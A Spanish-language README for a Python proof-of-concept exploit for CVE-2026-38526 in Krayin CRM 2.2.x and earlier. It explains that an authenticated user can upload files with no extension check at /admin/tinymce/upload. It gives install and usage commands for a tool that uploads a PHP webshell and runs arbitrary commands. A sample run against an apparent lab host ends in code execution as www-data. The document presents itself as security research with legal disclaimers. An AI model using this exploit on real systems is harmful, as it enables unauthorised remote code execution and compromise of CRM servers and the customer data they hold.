
PoC en Python que explota CVE-2026-38526 en Krayin CRM <= 2.2.x: se autentica, sube un webshell PHP a través de /admin/tinymce/upload y ejecuta comandos de forma remota.
⚠️ Aviso legal: este código se proporciona únicamente con fines educativos y para pruebas autorizadas (CTF, bug bounty, laboratorio privado). El autor no se hace responsable de un uso ilegal.
Krayin CRM (Webkul) ≤ 2.2.x expone el endpoint /admin/tinymce/upload
que permite a un usuario autenticado (incluso con privilegios bajos)
subir archivos sin validación de extensión. El archivo es
servido posteriormente desde la carpeta storage/, lo que permite la ejecución
arbitraria de código PHP.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
Opciones:
| Opción | Descripción |
|---|---|
-t, --target | URL raíz del objetivo |
-u, --user | Email de la cuenta Krayin |
-p, --password | Contraseña |
-c, --command | Comando a ejecutar (por defecto: id) |
--login-path | Ruta de login (por defecto: /admin/login) |
--upload-path | Ruta de subida (por defecto: /admin/tinymce/upload) |
--timeout | Timeout HTTP (por defecto: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] Obtención del token CSRF en http://billing.nexus.htb/admin/login
[*] Envío del formulario de login
[+] Autenticación exitosa
[*] Subida de x8f2k1ab.php vía http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accesible: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Ejecución: id
============================================================
[+] Comando: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ y uploads/.Este proyecto se publica con fines de investigación en seguridad. Cualquier uso contra sistemas sin autorización escrita previa es ilegal y estrictamente prohibido.